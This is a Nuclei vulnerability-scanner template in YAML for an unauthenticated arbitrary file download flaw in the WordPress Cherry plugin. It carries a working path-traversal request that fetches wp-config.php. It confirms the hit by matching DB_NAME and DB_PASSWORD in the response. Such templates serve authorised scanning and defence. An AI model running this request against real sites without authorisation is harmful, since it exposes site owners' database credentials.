nuclei-templates/vulnerabilities/wordpress/cherry-file-download.yaml

30 lines
990 B
YAML
Raw Normal View History

id: cherry-file-download
info:
name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Download
author: 0x_Akoko
severity: high
description: The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
reference:
- https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
- https://github.com/CherryFramework/cherry-plugin
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200